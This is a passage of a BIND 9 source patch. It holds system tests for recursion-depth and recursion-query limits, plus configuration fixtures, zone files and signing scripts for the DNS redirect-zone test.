+SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=0 + +ns3_reset() { + copy_setports $1 ns3/named.conf + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} reconfig 2>&1 | sed 's/^/I:ns3 /' + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} flush | sed 's/^/I:ns3 /' +} + +ns3_sends_aaaa_queries() { + if grep "started AAAA fetch" ns3/named.run >/dev/null; then + return 0 + else + return 1 + fi +} + +# Check whether the number of queries ans2 received from ns3 (this value is +# read from dig output stored in file $1) is as expected. The expected query +# count is variable: +# - if ns3 sends AAAA queries, the query count should equal $2, +# - if ns3 does not send AAAA queries, the query count should equal $3. +check_query_count() { + count1=`sed 's/[^0-9]//g;' $1` + count2=`sed 's/[^0-9]//g;' $2` + count=`expr $count1 + $count2` + #echo_i "count1=$count1 count2=$count2 count=$count" + expected_count_with_aaaa=$3 + expected_count_without_aaaa=$4 + + if ns3_sends_aaaa_queries; then + expected_count=$expected_count_with_aaaa + else + expected_count=$expected_count_without_aaaa + fi + + if [ $count -ne $expected_count ]; then + echo_i "count $count (actual) != $expected_count (expected)" + ret=1 + fi +} + +echo_i "set max-recursion-depth=12" + +n=`expr $n + 1` +echo_i "attempt excessive-depth lookup ($n)" +ret=0 +echo "1000" > ans2/ans.limit +echo "1000" > ans4/ans.limit +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect1.example.org > dig.out.1.test$n || ret=1 +grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 27 14 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "12" > ans2/ans.limit +echo "12" > ans4/ans.limit +ns3_reset ns3/named1.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect2.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 50 26 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=5" + +n=`expr $n + 1` +echo_i "attempt excessive-depth lookup ($n)" +ret=0 +echo "12" > ans2/ans.limit +ns3_reset ns3/named2.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect3.example.org > dig.out.1.test$n || ret=1 +grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 13 7 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "5" > ans2/ans.limit +echo "5" > ans4/ans.limit +ns3_reset ns3/named2.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect4.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 22 12 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=100, max-recursion-queries=50" + +n=`expr $n + 1` +echo_i "attempt excessive-queries lookup ($n)" +ret=0 +echo "13" > ans2/ans.limit +echo "13" > ans4/ans.limit +ns3_reset ns3/named3.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect5.example.org > dig.out.1.test$n || ret=1 +if ns3_sends_aaaa_queries; then + grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +fi +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "12" > ans2/ans.limit +ns3_reset ns3/named3.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect6.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=100, max-recursion-queries=40" + +n=`expr $n + 1` +echo_i "attempt excessive-queries lookup ($n)" +ret=0 +echo "11" > ans2/ans.limit +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect7.example.org > dig.out.1.test$n || ret=1 +if ns3_sends_aaaa_queries; then + grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +fi +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 40 ] || { ret=1; echo_i "count ($count) !<= 40"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "9" > ans2/ans.limit +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect8.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 40 ] || { ret=1; echo_i "count ($count) !<= 40"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempting NS explosion ($n)" +ret=0 +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.3 ns1.1.example.net > dig.out.1.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -lt 50 ] || ret=1 +$DIG $DIGOPTS +short @10.53.0.7 count txt > dig.out.3.test$n || ret=1 +eval count=`cat dig.out.3.test$n` +[ $count -lt 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +#grep "duplicate query" ns3/named.run +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/redirect/clean.sh b/bin/tests/system/redirect/clean.sh new file mode 100644 index 0000000..9489c94 --- /dev/null +++ b/bin/tests/system/redirect/clean.sh @@ -0,0 +1,38 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */named.stats +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns1/K* +rm -f ns1/dsset-nsec3. +rm -f ns1/dsset-signed. +rm -f ns1/nsec3.db* +rm -f ns1/signed.db* +rm -f ns2/*.db +rm -f ns3/K* +rm -f ns3/dsset-nsec3. +rm -f ns3/dsset-signed. +rm -f ns3/nsec3.db* +rm -f ns3/signed.db* +rm -f ns4/*.db +rm -f ns5/dsset-* +rm -f ns5/K* ns5/sign.ns5.* +rm -f ns5/root.db ns5/root.db.signed +rm -f ns5/signed.db ns5/signed.db.signed +rm -f ns6/signed.db.signed +rm -f rndc.out +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/redirect/conf/bad1.conf b/bin/tests/system/redirect/conf/bad1.conf new file mode 100644 index 0000000..5ff4fee --- /dev/null +++ b/bin/tests/system/redirect/conf/bad1.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "hint.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; + allow-query { 10.0.1.0; }; +/* option 'forwarders' is not allowed in 'redirect' zone '.' */ + forwarders { 1.2.3.4; }; +}; diff --git a/bin/tests/system/redirect/conf/bad2.conf b/bin/tests/system/redirect/conf/bad2.conf new file mode 100644 index 0000000..0cf0a68 --- /dev/null +++ b/bin/tests/system/redirect/conf/bad2.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "hint.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; + allow-query { 10.0.1.0; }; +/* option 'also-notify' is not allowed in 'redirect' zone '.' */ + also-notify { 1.2.3.4; }; +}; diff --git a/bin/tests/system/redirect/conf/bad3.conf b/bin/tests/system/redirect/conf/bad3.conf new file mode 100644 index 0000000..b034c5b --- /dev/null +++ b/bin/tests/system/redirect/conf/bad3.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "hint.db"; +}; + +/* redirect zones must be called "." */ +zone "x" { + type redirect; + file "redirect.db"; + allow-query { 10.0.1.0; }; +}; diff --git a/bin/tests/system/redirect/conf/good1.conf b/bin/tests/system/redirect/conf/good1.conf new file mode 100644 index 0000000..c5711e5 --- /dev/null +++ b/bin/tests/system/redirect/conf/good1.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "hint.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; +}; diff --git a/bin/tests/system/redirect/conf/good2.conf b/bin/tests/system/redirect/conf/good2.conf new file mode 100644 index 0000000..156995b --- /dev/null +++ b/bin/tests/system/redirect/conf/good2.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type master; + file "master.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; +}; diff --git a/bin/tests/system/redirect/conf/good3.conf b/bin/tests/system/redirect/conf/good3.conf new file mode 100644 index 0000000..dcdd954 --- /dev/null +++ b/bin/tests/system/redirect/conf/good3.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type secondary; + file "sec.db"; + primaries { 1.2.3.4; }; +}; + +zone "." { + type redirect; + file "redirect.db"; +}; diff --git a/bin/tests/system/redirect/conf/good4.conf b/bin/tests/system/redirect/conf/good4.conf new file mode 100644 index 0000000..e046577 --- /dev/null +++ b/bin/tests/system/redirect/conf/good4.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "hint.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; + allow-query { 10.0.1.0; }; +}; diff --git a/bin/tests/system/redirect/ns1/example.db b/bin/tests/system/redirect/ns1/example.db new file mode 100644 index 0000000..90c09d4 --- /dev/null +++ b/bin/tests/system/redirect/ns1/example.db @@ -0,0 +1,50 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 marka.isc.org. 0 0 0 0 1200 +@ NS ns1 +ns1 A 10.53.0.1 +excluded-good-a AAAA 2001:eeee::1 + A 1.2.3.4 +excluded-bad-a AAAA 2001:eeee::2 + A 10.0.0.1 +excluded-only AAAA 2001:eeee::3 +partially-excluded-good-a AAAA 2001:eeee::1 + AAAA 2001::1 + A 1.2.3.4 +partially-excluded-bad-a AAAA 2001:eeee::2 + AAAA 2001::2 + A 10.0.0.1 +partially-excluded-only AAAA 2001:eeee::3 + AAAA 2001::3 +a-only A 1.2.3.5 +a-and-aaaa AAAA 2001::1 + A 1.2.3.6 +aaaa-only AAAA 2001::2 +a-not-mapped A 10.0.0.2 +mx-only MX 10 ns.example. +cname-excluded-good-a CNAME excluded-good-a +cname-excluded-bad-a CNAME excluded-bad-a +cname-excluded-only CNAME excluded-only +cname-partial-excluded-good-a CNAME partial-excluded-good-a +cname-partial-excluded-bad-a CNAME partial-excluded-bad-a +cname-partial-excluded-only CNAME partial-excluded-only +cname-a-only CNAME a-only +cname-a-and-aaaa CNAME a-and-aaaa +cname-aaaa-only CNAME aaaa-only +cname-a-not-mapped CNAME a-not-mapped +cname-mx-only CNAME mx-only +cname-non-existent CNAME non-existent +ttl-less-than-600 500 A 5.6.7.8 +ttl-more-than-600 700 A 5.6.7.8 +ttl-less-than-minimum 1100 A 5.6.7.8 +ttl-more-than-minimum 1300 A 5.6.7.8 diff --git a/bin/tests/system/redirect/ns1/named.conf.in b/bin/tests/system/redirect/ns1/named.conf.in new file mode 100644 index 0000000..412b874 --- /dev/null +++ b/bin/tests/system/redirect/ns1/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + allow-recursion { 10.53.0.1; }; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "signed" { + type primary; + file "signed.db.signed"; +}; + +zone "nsec3" { + type primary; + file "nsec3.db.signed"; +}; + +zone "." { + type redirect; + file "redirect.db"; + allow-query { !10.53.0.2; !10.53.0.4; any; }; +}; + +// include "trusted.conf"; diff --git a/bin/tests/system/redirect/ns1/redirect.db b/bin/tests/system/redirect/ns1/redirect.db new file mode 100644 index 0000000..b2a60bb --- /dev/null +++ b/bin/tests/system/redirect/ns1/redirect.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0 +@ IN NS ns.example.net +; +; NS records do not need address records in this zone as it is not in the +; normal namespace. +; +*. IN A 100.100.100.2 +*. IN AAAA 2001:ffff:ffff::100.100.100.2 diff --git a/bin/tests/system/redirect/ns1/root.db b/bin/tests/system/redirect/ns1/root.db new file mode 100644 index 0000000..6df215f --- /dev/null +++ b/bin/tests/system/redirect/ns1/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +example NS ns1.example. +ns1.example. A 10.53.0.1 +signed NS ns1.example. +ns1.signed. A 10.53.0.1 diff --git a/bin/tests/system/redirect/ns1/sign.sh b/bin/tests/system/redirect/ns1/sign.sh new file mode 100644 index 0000000..500dee6 --- /dev/null +++ b/bin/tests/system/redirect/ns1/sign.sh @@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=signed +infile=example.db +zonefile=signed.db + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +zone=nsec3 +infile=example.db +zonefile=nsec3.db + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -fk $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -3 - -g -o $zone $zonefile > /dev/null diff --git a/bin/tests/system/redirect/ns2/example.db.in b/bin/tests/system/redirect/ns2/example.db.in new file mode 100644 index 0000000..a87ae7d --- /dev/null +++ b/bin/tests/system/redirect/ns2/example.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0 +@ NS ns2 +ns2 A 10.53.0.2 +a A 10.53.0.2 diff --git a/bin/tests/system/redirect/ns2/named.conf.in b/bin/tests/system/redirect/ns2/named.conf.in new file mode 100644 index 0000000..9e8cbde --- /dev/null +++ b/bin/tests/system/redirect/ns2/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "." { + type redirect; + file "redirect.db"; + allow-query { !10.53.0.4; any; }; +}; + +zone "example.nil" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/redirect/ns2/redirect.db.in b/bin/tests/system/redirect/ns2/redirect.db.in new file mode 100644 index 0000000..e05d64d --- /dev/null +++ b/bin/tests/system/redirect/ns2/redirect.db.in @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0 +@ IN NS ns.example.net +; +; NS records do not need address records in this zone as it is not in the +; normal namespace. +; +*. IN A 100.100.100.1 +*. IN AAAA 2001:ffff:ffff::100.100.100.1 diff --git a/bin/tests/system/redirect/ns3/example.db b/bin/tests/system/redirect/ns3/example.db new file mode 100644 index 0000000..4cceedf --- /dev/null +++ b/bin/tests/system/redirect/ns3/example.db @@ -0,0 +1,50 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns3 marka.isc.org. 0 0 0 0 1200 +@ NS ns3 +ns3 A 10.53.0.3 +excluded-good-a AAAA 2001:eeee::1 + A 1.2.3.4 +excluded-bad-a AAAA 2001:eeee::2 + A 10.0.0.1 +excluded-only AAAA 2001:eeee::3 +partially-excluded-good-a AAAA 2001:eeee::1 + AAAA 2001::1 + A 1.2.3.4 +partially-excluded-bad-a AAAA 2001:eeee::2 + AAAA 2001::2 + A 10.0.0.1 +partially-excluded-only AAAA 2001:eeee::3 + AAAA 2001::3 +a-only A 1.2.3.5 +a-and-aaaa AAAA 2001::1 + A 1.2.3.6 +aaaa-only AAAA 2001::2 +a-not-mapped A 10.0.0.2 +mx-only MX 10 ns.example. +cname-excluded-good-a CNAME excluded-good-a +cname-excluded-bad-a CNAME excluded-bad-a +cname-excluded-only CNAME excluded-only +cname-partial-excluded-good-a CNAME partial-excluded-good-a +cname-partial-excluded-bad-a CNAME partial-excluded-bad-a +cname-partial-excluded-only CNAME partial-excluded-only +cname-a-only CNAME a-only +cname-a-and-aaaa CNAME a-and-aaaa +cname-aaaa-only CNAME aaaa-only +cname-a-not-mapped CNAME a-not-mapped +cname-mx-only CNAME mx-only +cname-non-existent CNAME non-existent +ttl-less-than-600 500 A 5.6.7.8 +ttl-more-than-600 700 A 5.6.7.8 +ttl-less-than-minimum 1100 A 5.6.7.8 +ttl-more-than-minimum 1300 A 5.6.7.8 diff --git a/bin/tests/system/redirect/ns3/named.conf.in b/bin/tests/system/redirect/ns3/named.conf.in new file mode 100644 index 0000000..2113dd5 --- /dev/null +++ b/bin/tests/system/redirect/ns3/named.conf.in @@ -0,0 +1,54 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-recursion { 10.53.0.3; }; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "signed" { + type primary; + file "signed.db.signed"; +}; + +zone "nsec3" { + type primary; + file "nsec3.db.signed"; +}; + +zone "redirect" { + type primary; + file "redirect.db"; +}; + +// include "trusted.conf"; diff --git a/bin/tests/system/redirect/ns3/redirect.db b/bin/tests/system/redirect/ns3/redirect.db new file mode 100644 index 0000000..b5b63da --- /dev/null +++ b/bin/tests/system/redirect/ns3/redirect.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA a.root-servers.nil. hostmaster.example.net. 0 0 0 0 0 +@ IN NS a.root-servers.nil. +* IN A 100.100.100.1 +* IN AAAA 2001:ffff:ffff::100.100.100.1 diff --git a/bin/tests/system/redirect/ns3/root.db b/bin/tests/system/redirect/ns3/root.db new file mode 100644 index 0000000..13433ef --- /dev/null +++ b/bin/tests/system/redirect/ns3/root.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.3 +example NS ns1.example. +ns1.example. A 10.53.0.3 +signed NS ns1.example. +ns1.signed. A 10.53.0.3 +redirect NS a.root-servers.nil diff --git a/bin/tests/system/redirect/ns3/sign.sh b/bin/tests/system/redirect/ns3/sign.sh new file mode 100644 index 0000000..500dee6 --- /dev/null +++ b/bin/tests/system/redirect/ns3/sign.sh @@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=signed +infile=example.db +zonefile=signed.db + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} 